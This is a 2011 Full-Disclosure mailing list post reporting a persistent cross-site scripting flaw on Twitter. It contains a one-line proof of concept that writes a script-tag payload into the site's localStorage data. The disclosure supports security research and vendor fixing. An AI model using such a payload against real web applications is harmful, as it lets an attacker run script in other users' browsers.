[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] A persistent xss on twitter,another xss rootkit

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] A persistent xss on twitter,another xss rootkit
From: WooYun <root@xxxxxxxxxx>
Date: Tue, 25 Oct 2011 00:25:48 +0800

Hi

someone report a persistent xss about twitter on wooyun

http://www.wooyun.org/bugs/wooyun-2010-03075

just put on some magic code like this

localStorage.setItem(":USER:",'{"54lvwei":{"value":{"store":{"recentFollowers":{"value":"hellolvwei<script>alert(/aaaaaa/)</script>"}}}}}');

:)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] Tor anonymizing network Compromised by French researchers
Next by Date: Re: [Full-disclosure] G+ app steals images
Previous by thread: [Full-disclosure] [SECURITY] [DSA 2328-1] freetype security update
Next by thread: [Full-disclosure] [SECURITY] [DSA 2327-1] libfcgi-perl security-update
Index(es):
- Date
- Thread